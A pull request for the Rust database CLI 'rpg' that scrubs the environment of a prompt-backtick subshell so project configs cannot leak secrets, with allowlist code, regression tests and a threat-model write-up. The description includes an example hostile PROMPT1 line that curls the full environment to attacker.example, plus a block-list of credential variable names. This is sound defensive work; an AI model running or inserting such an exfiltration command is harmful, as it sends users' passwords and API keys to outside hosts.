### PR TITLE
fix(security): scrub prompt-backtick subshell env (#824 H6)

### DIFF
--- a/src/repl/mod.rs
+++ b/src/repl/mod.rs
@@ -218,6 +218,38 @@ pub struct PromptContext<'a> {
     pub backend_pid: Option<u32>,
 }
 
+/// Environment variables forwarded to the prompt-backtick subshell.
+///
+/// The subshell is otherwise spawned with [`Command::env_clear`] so that
+/// secrets in the parent process (`PGPASSWORD`, `*_API_KEY`, `*_TOKEN`,
+/// `AWS_*`, ...) cannot be exfiltrated by a hostile `PROMPT1`/`PROMPT2`
+/// loaded via untrusted `.rpg.toml` (#824 H6, paired with H5's project-
+/// config trust check).
+///
+/// Variables on this list are needed for ordinary prompt commands to
+/// work (`HOME` for `~`-expansion, `PATH` for executable lookup, locale
+/// vars for proper formatting, ...).  Secrets and credential paths are
+/// deliberately excluded — see the block-list in #824 H6.
+const PROMPT_BACKTICK_ENV_ALLOWLIST: &[&str] = &[
+    "HOME",    // `~`-expansion and many tools' config discovery
+    "PATH",    // executable lookup (the whole point of backticks)
+    "USER",    // common in prompts
+    "LOGNAME", // common in prompts (BSD/macOS analogue of USER)
+    "LANG",    // locale (LC_* handled separately by prefix match)
+    "TERM",    // terminal type
+    "TZ",      // time zone
+    "SHELL",   // tools that introspect the user's shell
+];
+
+/// Prefix-matched env-var allowlist for the prompt-backtick subshell.
+///
+/// Variables whose name starts with any of these prefixes are forwarded.
+/// Today only `LC_*` (locale categories) qualifies; kept as a slice so
+/// future additions are an obvious one-liner.
+const PROMPT_BACKTICK_ENV_PREFIX_ALLOWLIST: &[&str] = &[
+    "LC_", // locale categories (LC_ALL, LC_CTYPE, LC_MESSAGES, ...)
+];
+
 /// Expand backtick-delimited shell commands in a prompt string.
 ///
 /// Matches psql behaviour: `` `cmd` `` is replaced with the trimmed stdout of
@@ -231,6 +263,11 @@ pub struct PromptContext<'a> {
 /// never from query input or remote data. This matches psql's behaviour and is
 /// intentional, but callers must ensure that only prompt strings from user
 /// config are passed here.
+///
+/// The subshell is spawned with a hardened, allowlisted environment
+/// (see [`PROMPT_BACKTICK_ENV_ALLOWLIST`]) — the parent's `PGPASSWORD`,
+/// `*_API_KEY`, `*_TOKEN`, `AWS_*`, etc. are NOT inherited.  This blocks
+/// the secret-exfiltration vector documented as #824 H6.
 ///
 /// This pass should be applied *before* [`expand_prompt`] so that the shell
 /// output can itself contain `%`-sequences (though in practice this is rare).
@@ -278,10 +315,29 @@ pub fn expand_prompt_backticks(prompt: &str) -> String {
                 if result.ends_with('%') {
                     result.pop();
                 }
-                // Execute the command and capture stdout.
-                let output = std::process::Command::new("sh")
-                    .arg("-c")
-                    .arg(&cmd)
+                // Execute the command and capture stdout.  Scrub the
+                // environment to block secret exfiltration via a hostile
+                // PROMPT1 (#824 H6): start from an empty env, then forward
+                // only the documented allowlist of safe variables.
+                let mut command = std::process::Command::new("sh");
+                command.arg("-c").arg(&cmd).env_clear();
+                for name in PROMPT_BACKTICK_ENV_ALLOWLIST {
+                    if let Some(value) = std::env::var_os(name) {
+                        command.env(name, value);
+                    }
+                }
+                for (name, value) in std::env::vars_os() {
+                    let Some(name_str) = name.to_str() else {
+                        continue;
+                    };
+                    if PROMPT_BACKTICK_ENV_PREFIX_ALLOWLIST
+                        .iter()
+                        .any(|prefix| name_str.starts_with(prefix))
+                    {
+                        command.env(&name, value);
+                    }
+                }
+                let output = command
                     .output()
                     .ok()
                     .and_then(|o| String::from_utf8(o.stdout).ok())
@@ -9222,7 +9278,9 @@ mod tests {
     #[test]
     #[cfg(not(target_arch = "wasm32"))]
     fn backtick_subshell_does_not_inherit_sensitive_env() {
-        let _guard = ENV_MUTEX.lock().unwrap_or_else(|e| e.into_inner());
+        let _guard = ENV_MUTEX
+            .lock()
+            .unwrap_or_else(std::sync::PoisonError::into_inner);
         // Pick variable names from the documented block-list.  Any one of
         // these leaking would be a security-relevant regression.
         let cases: &[(&str, &str)] = &[
@@ -9253,7 +9311,9 @@ mod tests {
     #[test]
     #[cfg(not(target_arch = "wasm32"))]
     fn backtick_subshell_keeps_allowlisted_env() {
-        let _guard = ENV_MUTEX.lock().unwrap_or_else(|e| e.into_inner());
+        let _guard = ENV_MUTEX
+            .lock()
+            .unwrap_or_else(std::sync::PoisonError::into_inner);
         // PATH is required for the subshell to find `printenv` itself, so
         // a positive test on PATH would be circular.  Use HOME instead:
         // it is on the allowlist and `printenv HOME` works without PATH
@@ -9269,7 +9329,8 @@ mod tests {
             None => std::env::remove_var("HOME"),
         }
         assert_eq!(
-            rendered, format!("[{sentinel}]"),
+            rendered,
+            format!("[{sentinel}]"),
             "HOME must be forwarded to prompt-backtick subshell"
         );
     }

--- a/src/repl/mod.rs
+++ b/src/repl/mod.rs
@@ -9211,6 +9211,69 @@ mod tests {
         );
     }
 
+    // Regression test for #824 H6: prompt-backtick subshells inherit the
+    // full process env, leaking secrets like PGPASSWORD / *_API_KEY when a
+    // malicious PROMPT1 is loaded (e.g. via untrusted `.rpg.toml`, see H5).
+    // The fix in `expand_prompt_backticks` runs the subshell with a
+    // hardened, allowlisted environment.  This test exercises the threat
+    // model: a sensitive variable is set in the parent process; the prompt
+    // expands `printenv` for that variable; the rendered output must not
+    // contain the secret.
+    #[test]
+    #[cfg(not(target_arch = "wasm32"))]
+    fn backtick_subshell_does_not_inherit_sensitive_env() {
+        let _guard = ENV_MUTEX.lock().unwrap_or_else(|e| e.into_inner());
+        // Pick variable names from the documented block-list.  Any one of
+        // these leaking would be a security-relevant regression.
+        let cases: &[(&str, &str)] = &[
+            ("PGPASSWORD", "rpg-h6-pgpassword-should-not-leak"),
+            ("ANTHROPIC_API_KEY", "rpg-h6-anthropic-should-not-leak"),
+            ("OPENAI_API_KEY", "rpg-h6-openai-should-not-leak"),
+            ("AWS_SECRET_ACCESS_KEY", "rpg-h6-aws-should-not-leak"),
+            ("RPG_TEST_SECRET_TOKEN", "rpg-h6-generic-should-not-leak"),
+        ];
+        for (name, value) in cases {
+            // Tests that mutate env are serialised by ENV_MUTEX.
+            std::env::set_var(name, value);
+            let template = format!("[`printenv {name}`]");
+            let rendered = expand_prompt_backticks(&template);
+            // Remove before asserting so we never leak state if the
+            // assertion fires.
+            std::env::remove_var(name);
+            assert!(
+                !rendered.contains(value),
+                "prompt backtick must not leak {name}; got: {rendered:?}"
+            );
+        }
+    }
+
+    // Allowlisted variables (HOME, PATH, USER, ...) MUST still be visible
+    // to the subshell so that real-world prompts like
+    // `PROMPT1='[`git branch --show-current`] '` keep working.
+    #[test]
+    #[cfg(not(target_arch = "wasm32"))]
+    fn backtick_subshell_keeps_allowlisted_env() {
+        let _guard = ENV_MUTEX.lock().unwrap_or_else(|e| e.into_inner());
+        // PATH is required for the subshell to find `printenv` itself, so
+        // a positive test on PATH would be circular.  Use HOME instead:
+        // it is on the allowlist and `printenv HOME` works without PATH
+        // shenanigans because `printenv` is resolved via PATH (allowlisted).
+        let sentinel = "/tmp/rpg-h6-home-allowed";
+        let saved_home = std::env::var_os("HOME");
+        // Serialised by ENV_MUTEX.
+        std::env::set_var("HOME", sentinel);
+        let rendered = expand_prompt_backticks("[`printenv HOME`]");
+        // Restore HOME so other tests that depend on it are unaffected.
+        match saved_home {
+            Some(v) => std::env::set_var("HOME", v),
+            None => std::env::remove_var("HOME"),
+        }
+        assert_eq!(
+            rendered, format!("[{sentinel}]"),
+            "HOME must be forwarded to prompt-backtick subshell"
+        );
+    }
+
     // -- build_prompt_from_settings -------------------------------------------
 
     #[test]


### PR DESCRIPTION
## Summary

Closes the **#824 H6** secret-exfiltration vector. `expand_prompt_backticks`
in `src/repl/mod.rs` previously spawned `sh -c "<cmd>"` with the parent
process's full environment, so a hostile `PROMPT1` / `PROMPT2` could read
`PGPASSWORD`, `ANTHROPIC_API_KEY`, `OPENAI_API_KEY`, `AWS_SECRET_ACCESS_KEY`,
and friends.

## Threat model

1. Attacker plants a malicious `.rpg.toml` in a repo (project-config trust
   is the **#824 H5** finding — separate fix in flight).
2. Victim clones the repo and runs `rpg` inside it.
3. rpg loads the project config, which sets:
   ```toml
   PROMPT1 = "[`curl -fsSL --data-urlencode env@<(env) https://attacker.example/`] %/ # "
   ```
4. On first prompt render, the backtick subshell inherits `PGPASSWORD`,
   `*_API_KEY`, etc. and sends them off-host. **Game over.**

## Fix

Spawn the subshell with `Command::env_clear()` and forward only a
documented allowlist of safe variables. Both pieces live next to the
call site so the threat is obvious to future readers.

**Allowlist** (exact-match):
- `HOME` — `~`-expansion, tool config discovery
- `PATH` — executable lookup (the whole point of backticks)
- `USER`, `LOGNAME` — common in prompts
- `LANG` — locale
- `TERM` — terminal type
- `TZ` — time zone
- `SHELL` — tools that introspect the user's shell

**Allowlist** (prefix-match):
- `LC_*` — locale categories (`LC_ALL`, `LC_CTYPE`, `LC_MESSAGES`, ...)

**Block-list** (NOT forwarded — the threat being closed):
- `PGPASSWORD`, `PGPASSFILE`, `PGSERVICEFILE`
- `ANTHROPIC_API_KEY`, `OPENAI_API_KEY`, any `*_API_KEY` / `*_TOKEN` /
  `*_SECRET`
- `AWS_*`, `GCP_*`, `AZURE_*`
- `SSH_AUTH_SOCK`
- everything else not on the allowlist

## Compatibility

Real-world prompts continue to work because they only need `PATH` and
sometimes `HOME`:

- `PROMPT1='[\`git branch --show-current\`] %/ # '` — `git` is on `PATH`, no
  blocked vars needed.
- `PROMPT1='%n@\`hostname -s\`:%/ %# '` — `hostname` is on `PATH`.

## Related

- **#824 H5** — project-config trust check. The two findings together close
  the loop: H5 stops `.rpg.toml` from being silently trusted; H6 stops a
  trusted-but-naively-set `PROMPT1` from leaking secrets.

## Test plan

Red/green TDD per `CLAUDE.md`:

- [x] **Red commit (`f399c0d`)**: `backtick_subshell_does_not_inherit_sensitive_env`
      — sets `PGPASSWORD`, `ANTHROPIC_API_KEY`, `OPENAI_API_KEY`,
      `AWS_SECRET_ACCESS_KEY`, and a generic `*_TOKEN`; expands a prompt
      that runs `printenv NAME`; asserts the secret value is absent from
      the rendered output. Verified failing on `main` before fix.
- [x] **Green commit (`3dabbab`)**: implementation makes the red test pass
      AND adds `backtick_subshell_keeps_allowlisted_env` (positive test —
      `HOME` must still be visible).
- [x] `cargo test --lib --bins` — 2065 passed (was 2063 + 2 new), 0 failed,
      4 ignored.
- [x] `cargo fmt --check` — clean.
- [x] `cargo clippy --all-targets --all-features -- -D warnings` — clean.
- [x] All existing backtick tests still pass (`backtick_echo_hello`,
      `backtick_percent_before_backtick_consumed` — the #789 fix is
      preserved, etc.). 13/13 backtick tests green.